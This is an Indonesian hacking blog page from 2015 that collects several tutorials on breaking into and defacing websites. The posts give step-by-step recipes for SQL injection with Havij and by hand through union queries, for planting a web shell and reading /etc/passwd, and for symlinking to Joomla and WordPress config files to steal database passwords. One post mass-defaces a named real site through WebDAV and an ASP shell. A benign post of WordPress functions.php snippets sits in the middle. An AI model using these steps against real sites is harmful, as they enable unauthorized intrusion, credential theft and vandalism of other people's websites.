Tampilkan postingan dengan label cara deface website. Tampilkan semua postingan
Tampilkan postingan dengan label cara deface website. Tampilkan semua postingan

Rabu, 29 April 2015

Cara Hack Situs/Website

Hello apa kabar gan :) Salam dari Andri ya buat kalian semua Oh ya kli ini saya akan Ngasih tau ke kalian bagaimana cara meng Hack sebuat web/website 
Tetapi ini hanyalah Referensi bukan untuk menjahati orang Oke CHEKIDHOOOT...! :D

 
Bahan & Alat :
1) Target Website
2) Shell
3) script symlink
4) MySQL manager
Langkah 1
Sekarang, kita periksa situsnya apa ada yg vuln utk dihajar :v
Ada satu hal yang tersisa, kita dapat hack situs tsb pada server yang sama ( 1 server ) #aneh yoo? maksute opo ? tapi tungguen baca dulu sampe rampungg...

Jadi kita udah punya target toh, langkah selanjutnya, kita harus cari tau IP servernya target

Yuk pergi ke CMD ( Start->RUN->CMD )
Code:
ping www.target.com





Sekarang kita dah memiliki(mengetahui) IP Server nya, skrg waktunya untuk cari celah ( vuln ) nya.

Pergi ke SINI dan masukan kode dibawah ini :
Code:
IP:IPYANGUDAHKITADAPETDARIPINGTADI ".php?*="




Selanjutnya,dari hasil scan IP tadi cari sebuah situs yang rentan terhadap SQLi. (Bisa di inject menggunakan tools seperti havij dll)

Kalo sukses, segera tanem shell

Langkah II
Hal pertama yang perlu dilakukan adalah menemukan path lengkap dari situs tsb.
yakni seperti begino:
Code:
/home/username/public_html/

Sekarang pergi ke shell dan jalankan perintah ini:
Code:
cat /etc/passwd



Sekarang copy semua teks yg tertera di situh dan tempel ke notepad.
Itu file berisi semua pengguna yg menggunakan server yg jadi target muw


Langkah III
Target ku adalah Joomla dan aq tau di mana file yg berisi informasi MySQL. (config.php)
Code:
/home/targetsaya/public_html/configuration.php ( Ini config nya joomla )

kalau wordpress mas ?
Kalo targetmu wordpress , config nya ada disini
Code:
/home/targetmu/public_html/wp-config.php

Nah, skrg upload symlink mu dan mySQL Manager nya ,
Buka symlink nya dan masukin path config web targetmu
dalam kasus ku iku :
Code:
/home/softcube/public_html/configuration.php

  
Sekarang klik "Symlink" dan skrg kita dapet mysql info nya



Salin semua ke Notepad + +
( Notepad++ lebih baik karena kita dapat dgn mudah menemukan password dan username)
Cari username dan password web targetmu yg da tercantum di mysql info nya,,dan buka mysql.php ,
Masukkan dan sekarang kita dpat mengedit database.







Sekarang klik "Tabel" dan klik table "admin".
disini kita bisa membuat user, staff, dan membuat pssword
(Ingatlah untuk mencatat hash asli sehingga cara hackmu tetep gak terdeteksi jika ingin akses lgi


Sekarang, aq sudah mengganti hash(password admin) dan login

cara Hack wordpress dengan Functions.php

Seperti judul “hack wordpress functions.php mu” disini saya akan sedikit mengajarkan cara meng-“hack” wordpress menggunakan functions.php. Eits… tapi ini bukan “hack” yang mungkin kalian pikirkan, “hack” disini hack dalam definisi sebenarnya, disini saya tidak akan menjelaskan apa itu hack, karena itu berada di luar terotori atau wilayah saya, balik lagi ke topik.
Sekarang apa itu Functions.php ?
Functions.php adalah sebuah file yang berada di dalam directory tema wordpress dimana fungsinya sebagai fungsi alternatif yang akan akan dipanggil pertama kali sebelum memanggil fungsi core dari wordpress itu sendiri, kita bisa lihat contoh dibawah,
BinusHacker - Hack WordPress Functions.php
[user] => [homepage]
||
/
[homepage] => [tema] => [functions.php] => [wordpress core] => [homepage]
Oke, sekiranya itu penjelasan singkat dari apa yang saya mengerti, untuk lebih jelasnya silakan kunjungi codex.wordpress.org
1. Menambahkan Google Analytics
Masukan ini kedalam functions.php
<?php
add_action('wp_footer', 'add_googleanalytics');
function add_googleanalytics() { ?>
// Paste Google Analytics disini
<?php } ?>
2. Menambahkan Favicon ke Blog-mu
// Tambah favicon
function blog_favicon() {
echo '<link rel="Shortcut Icon" type="image/x-icon" href="'.get_bloginfo('wpurl').'http://url/ke/favicon.ico" />';
}
add_action('wp_head', 'blog_favicon');
3. Menghilangkan versi wordpress di meta head
function binhack_remove_version() {
return '';
}
add_filter('the_generator', 'binhack_remove_version');
4. Mengganti tulisan di footer yang berada di dashboard admin

function remove_footer_admin () {
echo 'Fueled by <a href="http://www.wordpress.org" target="_blank">WordPress</a> | Designed by <a href="http://www.anggapurnama.p.ht" target="_blank">anggamovic</a> | Binus|Hacker: <a href="http://www.binushacker.net" target="_blank">Binus|Hacker</a></p>';
}
add_filter('admin_footer_text', 'remove_footer_admin');
5. Menghilangkan tulisan error di wp-login.php
add_filter('login_errors',create_function('$a', "return null;"));
WP-LOGIN.php
Mungkin cukup untuk sekarang, kita bisa sambung dalam pertemuan berikutnya,

Selasa, 14 April 2015

Tutorial Deface Directory Folder dengan WebDav dan asp Shell IHCT

website yang saya gunkan ini adalah website thailand dan udah ane pakay webdav dan sudah tertanam asp Shell IHCT di dalem site nya kalo mau download asp shell IHCT Klik disini


untuk di dalam asp shell IHCT .. saya mengunakan satu website


http://www.ccamarketing.com/scripts/default.asp


lihat nii gambar . website tu ditulis sebagai : Ccmarketing


 
ok ... sekarang kita dah ada target ..


kalian masuk di dalam directory Ccmarketing .. ikut nama folder domain kalian sendiri .. untuk saya .. saya akan masuk folder macam dalam anak panah tu..


ok.. kita dah di dalam directory Ccmarketing


 ok ... macam gambar dekat atas tu ..
bila luu dah masuk dekat dalam directory tu .. luu akan jumpa perkataan : Mass deface on : ??????


ok.. kita klik tu .. perkataan tu berada di bawah garis yang pertama selepas Test.. macam dalam gambar ni .. (bahasa lain)


 Ok .. perkataan mass tu adalh untuk membuat pemeriksaan sama ada directory website tu boleh di deface ataupun tidak .. lu klik mass dulu .. kalau dah dia akan tertulis Done !


selepas tu .. bila dia  done .. kita ke langkah yang seterusnya .. korang klik dekat Mass deface macam dalam anak panah dekat gambar atas tu


 Brute: Test and Deface root and sub directories.

Single: Test and deface only root directories.


lihat perkataan tu ?? ok .. kita dah  selesai ..

di dalam kotak tu .. kamu masukan script deface kalian dekat dalam tu ... tik pada kotak ROOT

ok .. Lepas tu kalian tekan : Deface All

Maka akan keluar macam ni
 


ok .. nampaknya directory yang sudah di Deface itu adala dalam directory prodimages .. macam dalam gambar di atas

ok .. link di atas tadi adalah
http://www.ccamarketing.com/scripts/default.asp



directory yang sudah di Deface tadi adalah **/prodimages


kita ambil link


http://www.ccamarketing.com/ 


tambahkan /prodimages dekat belakang link itu .. di situ directory yang sudah di deface


terpulang dengan directory yang kalian dah deface tu .. untuk Ccamarketing ini .. directory yang dah di deface adalah /prodimages ..


kalau yang sudah di deface tu pada directory yang lain .. luu letak la nama directory tu belakang domain tu .. untuk domain yang saya guna ni adalah /prodimages .. jadi saya perlu buat macam ini


http://www.ccamarketing.com/prodimages 


ok .. copy link tu dah paste dekat address bar dan tekan enter


 


Deface saya berada di situ ..
ok .. jadi selamat mencuba ... Enjoy ..

Cara deface website dengan cara SQL manual

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini - See more at: http://indonesiahackercyberteam.blogspot.com/2014/02/cara-deface-website-dengan-teknik-sql.html#sthash.y3MRsvPh.dpuf